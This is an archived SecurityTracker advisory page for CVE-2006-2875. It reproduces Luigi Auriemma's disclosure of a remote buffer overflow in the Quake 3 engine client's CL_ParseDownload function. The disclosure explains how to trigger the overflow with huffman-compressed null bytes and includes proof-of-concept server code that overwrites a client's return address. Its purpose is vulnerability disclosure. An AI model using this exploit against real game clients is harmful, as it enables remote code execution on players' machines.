Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Quake 3 Buffer Overflow in CL_ParseDownload() Permits Remote Code Execution
|
|
SecurityTracker Alert ID: 1016219 |
|
SecurityTracker URL: http://securitytracker.com/id/1016219
|
|
CVE Reference:
CVE-2006-2875
(Links to External Site)
|
Updated: May 22 2009
|
Original Entry Date: Jun 5 2006
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): Quake 3; 1.32c; also Icculus.org Quake 3 revision 795 and prior versions
|
Description:
Luigi Auriemma reported a vulnerability in Quake. A remote server can execute arbitrary code on the target user's system.
The CL_ParseDownload function() in 'code/client/cl_parse.c' in the client code does not properly parse svc_download commands received from the connected server. A remote server can send specially crafted data to the connected client to trigger a buffer overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.
|
Impact:
A remote server can execute arbitrary code on the target user's system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.idsoftware.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 2 Jun 2006 18:46:03 +0200
Subject: Client buffer-overflow in Quake 3 engine (1.32c / rev 795)
|
#######################################################################
Luigi Auriemma
Application: Quake 3 engine
http://www.idsoftware.com
http://www.icculus.org/quake3/
Versions: Quake 3 <= 1.32c
Icculus.org Quake 3 <= revision 795
other derived projects
Games: exist many games which use the Quake 3 engine and
probably they are all vulnerable but I'm not able and
have no time to test them.
An enough complete list of these games is available here:
http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms: Windows, *nix, *BSD, Mac and others
Bug: buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date: 02 Jun 2006
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.
#######################################################################
======
2) Bug
======
The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.
The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:
void CL_ParseDownload ( msg_t *msg ) {
int size;
unsigned char data[MAX_MSGLEN];
...
size = MSG_ReadShort ( msg );
if (size > 0)
MSG_ReadData( msg, data, size );
...
Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but
is possible to bypass this limit through the huffman compression used
automatically and trasparently in the engine (thanx to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the
usual "stuff" (return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes
to avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so
the client can be attacked also immediately after the ending of the
connect handshake (just the first server's message).
#######################################################################
===========
3) The Code
===========
The server must be modified for sending the malformed svc_download
command and is possible to use the following instructions which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:
// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;
#######################################################################
======
4) Fix
======
Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it's a bit
long for me to find and contact each single developer of the other
open source projects).
#######################################################################
---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org
|
|
Go to the Top of This SecurityTracker Archive Page
|
